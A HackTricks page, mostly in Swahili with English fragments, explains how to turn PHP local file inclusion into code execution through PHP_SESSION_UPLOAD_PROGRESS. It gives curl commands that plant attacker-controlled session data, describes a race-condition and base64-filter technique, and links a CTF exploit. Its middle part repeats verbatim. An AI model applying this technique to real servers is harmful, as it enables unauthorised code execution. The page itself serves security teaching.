LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS

Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

Basic Info

Ikiwa umepata Local File Inclusion hata kama huna session na session.auto_start iko Off. Ikiwa session.upload_progress.enabled iko On na unatoa PHP_SESSION_UPLOAD_PROGRESS katika data ya multipart POST, PHP itafanya iwezeshe session kwa ajili yako.

$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
$ ls -a /var/lib/php/sessions/
. ..
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -d 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah'
$ ls -a /var/lib/php/sessions/
. ..
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -F 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah'  -F 'file=@/etc/passwd'
$ ls -a /var/lib/php/sessions/
. .. sess_iamorange

In the last example the session will contain the string blahblahblah

Note that with PHP_SESSION_UPLOAD_PROGRESS you can control data inside the session, so if you includes your session file you can include a part you control (a php shellcode for example).

Ingawa mafunzo mengi kwenye Mtandao yanapendekeza kuweka session.upload_progress.cleanup kuwa Off kwa ajili ya kusahihisha makosa. Kuweka session.upload_progress.cleanup kwa default katika PHP bado ni On. Inamaanisha kwamba maendeleo yako ya upakiaji katika kikao yatakuwa safishwa haraka iwezekanavyo. Hivyo hii itakuwa Race Condition.

The CTF

Katika CTF ya asili ambapo mbinu hii inazungumziwa, haikutosha kutumia Race Condition lakini yaliyomo yaliyopakiwa yalihitaji kuanza pia na mfuatano @<?php.

Kwa sababu ya mipangilio ya default ya session.upload_progress.prefix, faili yetu ya SESSION itaanza na kiambishi kisichofurahisha upload_progress_ Kama: upload_progress_controlledcontentbyattacker

Njia ya kuondoa kiambishi cha mwanzo ilikuwa base64encode payload mara 3 na kisha kuifungua kupitia vichujio convert.base64-decode, hii ni kwa sababu wakati wa base64 decoding PHP itafuta wahusika wa ajabu, hivyo baada ya mara 3 tu payload iliyotumwa na mshambuliaji itabaki (na kisha mshambuliaji anaweza kudhibiti sehemu ya mwanzo).

Taarifa zaidi katika andiko la asili https://blog.orange.tw/2018/10/ na exploit ya mwisho https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py Andiko lingine katika https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousLFI2RCE via Nginx temp files NextLFI2RCE via Segmentation Fault

Last updated 6 days ago

Basic Info

$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
$ ls -a /var/lib/php/sessions/
. ..
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -d 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah'
$ ls -a /var/lib/php/sessions/
. ..
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -F 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah'  -F 'file=@/etc/passwd'
$ ls -a /var/lib/php/sessions/
. .. sess_iamorange

In the last example the session will contain the string blahblahblah

Note that with PHP_SESSION_UPLOAD_PROGRESS you can control data inside the session, so if you includes your session file you can include a part you control (a php shellcode for example).

The CTF

Katika CTF ya asili ambapo mbinu hii inazungumziwa, haikutosha kutumia Race Condition lakini yaliyomo yaliyopakiwa yalihitaji kuanza pia na mfuatano @<?php.